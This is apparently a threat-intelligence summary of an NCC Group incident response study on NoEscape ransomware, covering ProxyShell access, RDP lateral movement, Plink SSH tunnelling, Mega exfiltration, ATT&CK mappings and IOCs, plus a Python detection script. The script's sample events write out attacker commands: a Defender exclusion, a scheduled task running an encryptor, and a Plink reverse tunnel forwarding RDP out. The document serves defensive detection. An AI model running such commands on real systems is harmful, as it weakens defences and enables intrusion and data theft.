An NCC Group incident response study analyzes NoEscape ransomware techniques observed in a recent engagement, highlighting opportunistic access and noisy tool use. The findings cover ProxyShell exploit access to Exchange, RDP lateral movement with SSH tunneling, Mega exfiltration, and ransomware execution via a scheduled task. #NoEscape #ProxyShell #NCCGroup #MicrosoftExchange #RDP #PuTTY #Plink #Mega #Avaddon #Cyble
Keypoints
- Incident response by NCC Group CIRT examined NoEscape ransomware activity and observed a mix of opportunistic tactics and a noisy toolset.
- Initial access occurred via publicly disclosed Exchange vulnerabilities (ProxyShell), with web shells deployed on the server.
- Execution included PowerShell to modify Defender/AV behavior and Windows Command Shell for discovery, plus a scheduled task to run the ransomware.
- Persistence relied on web shells; privilege escalation used valid domain and local accounts, including the DefaultAccount.
- Defense evasion involved deploying multiple drivers to disable security controls and credential dumping tools to obtain credentials.
- Lateral movement leveraged RDP with dumped LSASS credentials; C2 included SSH-tunneled RDP via PuTTY/Plink and use of TeamViewer for remote access.
- Exfiltration occurred to Mega cloud, followed by ransomware encryption of files; the encryptor targeted specific extensions on the C: drive.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Initial access gained by exploiting ProxyShell vulnerabilities. “The vulnerabilities CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 which are more commonly known as ProxyShell were exploited.”
- [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell used to add an exclusion path to the anti-virus. “PowerShell was utilised by the threat actor, using the Defender command Set-MpPreference to exclude specific paths from being monitored.”
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Native Windows commands used during discovery. “Windows native commands were executed during the discovery phase; targeting domain admin users, antivirus products installed etc.”
- [T1053.005] Scheduled Task – A Scheduled Task named SystemUpdate was used to execute the ransomware. “As has been well documented [2], a Scheduled Task with the name SystemUpdate was used to execute the ransomware.”
- [T1505.003] Server Software Component: Web Shell – Web shells provided continued access through the initial access vector. “Web Shells provided the threat actor continued access to the estate through the initial access vector.”
- [T1078.002] Valid Accounts: Domain Accounts – Credentials for domain accounts used for lateral movement and execution. “Threat actor gained credentials for valid domain accounts which were used for the majority of lateral movement and execution”
- [T1078.003] Valid Accounts: Local Accounts – Enabled DefaultAccount to execute tools locally. “The threat actor was observed enabling the DefaultAccount and utilising this to execute their tools locally on a host.”
- [T1562.001] Impair Defenses: Disable or Modify Tools – Dropped multiple drivers to disable EDR/AV; “throw the kitchen sink at it” approach. “multiple different drivers were dropped in an attempt to disable the deployed EDR and AV. Instead of deploying a single driver, multiple drivers and tools were dropped in a ‘throw the kitchen sink at it’ approach.”
- [T1003] OS Credential Dumping – Multiple credential dumping tools deployed to obtain credentials. “Similar to the above, multiple credential dumping tools were dropped by the threat actor in an attempt to obtain legitimate credentials.”
- [T1087.001] Account Discovery: Local Account – Use of built-in Windows commands to identify local admins. “A number of inbuilt Windows commands were used to gain an understanding of the local administrators on the group:”
- [T1018] Remote System Discovery – Discovery of network details (e.g., PDC) using netdom. “netdom query /d:REDACTED PDC”
- [T1021.001] Remote Desktop Protocol – Lateral movement via RDP using dumped credentials. “The primary method of lateral movement was RDP”
- [T1572] Protocol Tunnelling – PuTTY/Plink SSH tunneling to present RDP access. “PuTTY link onto multiple hosts… SSH tunnel was created to present RDP access…”
- [T1219] Remote Access Software – Use of TeamViewer to maintain access. “obtaining credentials to the TeamViewer deployment”
- [T1048.002] Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol – Data exfiltration to Mega cloud storage. “MegaSync was utilised to exfiltrate data to the cloud storage solution Mega”
- [T1486] Data Encrypted for Impact – Encryptor encrypted most files on C: drive. “The encryptor targeted all files on the C: drive except those with the below extension”
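As an added defender-side example (not code from the NCC Group report), the following Python turns the command-line indicators listed above (Set-MpPreference exclusions, the SystemUpdate scheduled task, Plink forwarding of RDP, netdom PDC lookup, MegaSync) into simple detections and runs them over constructed process-creation events; the hostnames, file paths and the 203.0.113.10 address are made up for illustration.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields);
# these are NOT log data from the engagement described in the report.
SAMPLE_EVENTS = [
    {"host": "EXCH01", "cmdline": 'powershell -nop -c "Set-MpPreference -ExclusionPath C:\\Users\\Public\\tools"'},
    {"host": "FS02", "cmdline": "schtasks /create /tn SystemUpdate /tr C:\\ProgramData\\enc.exe /sc once /st 23:00"},
    {"host": "FS02", "cmdline": "plink.exe -ssh -R 33890:127.0.0.1:3389 user@203.0.113.10 -pw REDACTED"},
    {"host": "DC01", "cmdline": "netdom query /d:corp.example PDC"},
    {"host": "FS02", "cmdline": "MegaSync.exe"},
    {"host": "WS07", "cmdline": "svchost.exe -k netsvcs"},  # benign, should not fire
]

# Each rule: MITRE technique id, what it flags, and a regex over the command line.
RULES = [
    ("T1562.001", "Defender exclusion added via Set-MpPreference",
     re.compile(r"Set-MpPreference\b.*-Exclusion(Path|Process|Extension)", re.I)),
    ("T1053.005", "Scheduled task named SystemUpdate created",
     re.compile(r"schtasks(\.exe)?\s+/create\b.*?/tn\s+\"?SystemUpdate\b", re.I)),
    ("T1572", "Plink SSH tunnel forwarding RDP (tcp/3389)",
     re.compile(r"plink(\.exe)?\b.*\s-(R|L)\s+\S*:3389\b", re.I)),
    ("T1018", "netdom used to locate the PDC",
     re.compile(r"netdom\s+query\b.*\bPDC\b", re.I)),
    ("T1048.002", "MegaSync client launched (possible exfiltration to Mega)",
     re.compile(r"(^|\\|\s)megasync\.exe\b", re.I)),
]


def detect(events):
    """Return (technique_id, host, description) for every event that matches
    a rule; one event may trigger several techniques."""
    hits = []
    for ev in events:
        for tech, desc, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                hits.append((tech, ev["host"], desc))
    return hits


if __name__ == "__main__":
    for tech, host, desc in detect(SAMPLE_EVENTS):
        print(f"[{tech}] {host}: {desc}")
```

The patterns key on the exact names seen in this engagement (SystemUpdate, MegaSync.exe), so treat them as a starting point and widen them to the generic behaviours (any new Defender exclusion, any SSH client forwarding 3389) in a production rule set.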
Indicators of Compromise
- [SHA1] – 142D950E7DD975056BD3487672C14C26450D55C1, 2F366382D2DB32AACA15F9CADC14C693B33C361F, and other hashes
- [SHA256] – 53B5A02259C69AB213BA1458D7F70B01614CC32E040B849AD67FEFB07A725945, 214551A8C07633D8C70F7BE4689EFE3BB74ABFD6E64264CF440100413EA6BE6B, and other hashes
- [IP] – 172.93.181[.]238, 66.203.125[.]14
- [File name] – MegaSync.exe, PuTTY Link